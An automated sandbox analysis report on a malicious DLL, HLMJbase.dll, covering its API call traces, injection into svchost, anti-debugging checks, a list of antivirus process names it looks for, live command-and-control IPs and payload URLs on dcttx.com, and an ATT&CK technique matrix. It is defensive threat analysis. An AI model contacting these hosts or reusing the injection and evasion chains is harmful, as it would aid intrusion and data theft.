Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEC9B0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,3_2_6CBEC9B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CF00CD mov eax, dword ptr fs:[00000030h]4_2_04CF00CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046C00CD mov eax, dword ptr fs:[00000030h]5_2_046C00CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC05070 GetProcessHeap,HeapAlloc,3_2_6CC05070
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC01C22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC01C22
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC016E3 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC016E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D6530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,4_2_048D6530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D69D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_048D69D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D8678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_048D8678
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048DAFAE SetUnhandledExceptionFilter,4_2_048DAFAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CDE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_054CDE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CEF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_054CEF64
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054D1EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_054D1EC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04336530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,5_2_04336530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_043369D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_043369D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04338678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04338678
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0433AFAE SetUnhandledExceptionFilter,5_2_0433AFAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E8DE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,5_2_04E8DE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E91EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04E91EC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E8EF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04E8EF64
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 38.147.186.138 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.204.213.99 7688Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D5830 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,4_2_048D5830
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_054C7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E87760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_04E87760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_054C7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_054C7760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe5_2_04E87760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe5_2_04E87760
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: rundll32.exe, 00000004.00000003.3595673865.0000000006356000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3607417606.0000000005C06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 min571345Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: rundll32.exe, 00000004.00000002.4182957404.0000000005634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
Source: rundll32.exe, 00000004.00000003.3784105886.0000000006352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3595132241.0000000006352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3607310533.0000000005C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min571345Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: rundll32.exe, 00000004.00000003.1892014772.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1925447650.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min571345Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_054C53C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_04E853C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC0130C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_6CC0130C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054D5D95 __lock,wsprintfW,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_054D5D95
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C6A00 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,4_2_054C6A00
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: rundll32.exeBinary or memory string: acs.exe
Source: rundll32.exeBinary or memory string: avcenter.exe
Source: rundll32.exeBinary or memory string: kxetray.exe
Source: rundll32.exeBinary or memory string: vsserv.exe
Source: rundll32.exeBinary or memory string: cfp.exe
Source: rundll32.exeBinary or memory string: avp.exe
Source: rundll32.exeBinary or memory string: KSafeTray.exe
Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exeBinary or memory string: 360Safe.exe
Source: rundll32.exeBinary or memory string: 360tray.exe
Source: rundll32.exeBinary or memory string: rtvscan.exe
Source: rundll32.exeBinary or memory string: TMBMSRV.exe
Source: rundll32.exeBinary or memory string: ashDisp.exe
Source: rundll32.exeBinary or memory string: 360Tray.exe
Source: rundll32.exeBinary or memory string: avgwdsvc.exe
Source: rundll32.exeBinary or memory string: AYAgent.aye
Source: rundll32.exeBinary or memory string: RavMonD.exe
Source: rundll32.exeBinary or memory string: QUHLPSVC.EXE
Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
Source: rundll32.exeBinary or memory string: Mcshield.exe
Source: rundll32.exeBinary or memory string: K7TSecurity.exe
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE768C bind,GetLastError,3_2_6CBE768C
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
11
Disable or Modify Tools
121
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop Protocol1
Screen Capture
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)322
Process Injection
2
Obfuscated Files or Information
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin Shares121
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object Model2
Clipboard Data
2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion
LSA Secrets31
Security Software Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Access Token Manipulation
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items322
Process Injection
DCSync2
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Rundll32
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Indicator Removal
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HLMJbase.dll3%VirustotalBrowse
HLMJbase.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dcttx.com
38.147.186.138
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://dcttx.com/19/77.binrundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739047373.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1738900816.00000000028C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738731092.0000000002D12000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1768941964.0000000002CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4176037293.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1833709462.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763620953.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1844676174.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2355356834.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2891476609.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795184851.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3064884794.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4176187047.000000000276C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2739932660.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795350329.0000000002785000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://dcttx.com/19/7.txtFailedrundll32.exe, rundll32.exe, 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4184561254.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.4183830787.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dllfalse
        unknown
        http://upx.sf.netAmcache.hve.8.drfalse
          high
          https://dcttx.com/19/7.txtprundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://dcttx.com/19/7.txtrundll32.exe, 00000003.00000003.1739047373.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2008105051.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://dcttx.com/19/7.txt.rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://dcttx.com/19/77.binHrundll32.exe, 00000003.00000002.2008196874.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770250771.000000000286B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://dcttx.com/19/7.txtDrundll32.exe, 00000003.00000002.2008105051.000000000284A000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://dcttx.com/19/77.bin.rundll32.exe, 00000003.00000002.2008196874.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770250771.000000000286B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      38.147.186.138
                      dcttx.comUnited States
                      138576CODECCLOUD-AS-APCodecCloudHKLimitedHKtrue
                      45.204.213.99
                      unknownSeychelles
                      134705ITACE-AS-APItaceInternationalLimitedHKtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1579416
                      Start date and time:2024-12-22 09:16:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:HLMJbase.dll
                      Detection:MAL
                      Classification:mal72.spyw.evad.winDLL@11/5@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 47
                      • Number of non-executed functions: 110
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.53.15, 4.245.163.56, 13.107.246.63
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      03:17:05API Interceptor1x Sleep call for process: loaddll32.exe modified
                      03:17:31API Interceptor1x Sleep call for process: WerFault.exe modified
                      03:17:47API Interceptor9061248x Sleep call for process: rundll32.exe modified
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CODECCLOUD-AS-APCodecCloudHKLimitedHKhttp://www.wagtg.comGet hashmaliciousUnknownBrowse
                      • 45.152.115.161
                      ULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                      • 38.147.162.173
                      file.exeGet hashmaliciousReverse SSHBrowse
                      • 45.152.67.101
                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousStealcBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousStealcBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousStealcBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousStealcBrowse
                      • 45.152.113.10
                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                      • 45.152.113.10
                      ITACE-AS-APItaceInternationalLimitedHKla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                      • 154.223.235.4
                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 154.194.197.213
                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 154.91.87.201
                      b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 156.237.86.243
                      ppc.elfGet hashmaliciousMiraiBrowse
                      • 156.230.199.0
                      hax.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 156.227.127.152
                      hax.arm5.elfGet hashmaliciousMiraiBrowse
                      • 156.237.86.244
                      mpsl.elfGet hashmaliciousMiraiBrowse
                      • 156.235.45.122
                      nshmpsl.elfGet hashmaliciousMiraiBrowse
                      • 156.235.45.170
                      sora.ppc.elfGet hashmaliciousMiraiBrowse
                      • 45.118.249.116
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eswift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                      • 38.147.186.138
                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                      • 38.147.186.138
                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                      • 38.147.186.138
                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                      • 38.147.186.138
                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                      • 38.147.186.138
                      Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                      • 38.147.186.138
                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                      • 38.147.186.138
                      No context
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.9980899760311247
                      Encrypted:false
                      SSDEEP:192:K9ziYOCQB0MnbUYjeTCd+zuiFCZ24IO84ci:4iJ9CMbUYjerzuiFCY4IO84ci
                      MD5:90714922E7230164D9ADF832CCF66281
                      SHA1:62B5394621CC9FCCDE6C35CB0209625418818685
                      SHA-256:62F5C29FCF21C69DB33FC0E12797A94B6C955A1BD3FEEEEC7FD4487D45C59C98
                      SHA-512:2C07A29ED699068BE52BCCC1F931BE28C02A1FDBCF64420CD86B25FDDAABC9561123E3ADA5B0E98652208CCA53E0E0424BCCAE4E230D618AE317BA77BF0EE8D2
                      Malicious:false
                      Reputation:low
